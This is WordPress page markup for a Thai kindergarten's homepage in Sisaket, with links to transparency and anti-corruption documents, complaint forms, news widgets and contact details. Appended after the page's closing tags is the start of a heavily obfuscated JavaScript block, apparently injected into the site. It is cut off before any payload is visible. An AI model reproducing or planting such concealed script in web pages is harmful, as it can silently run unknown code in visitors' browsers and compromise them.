href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 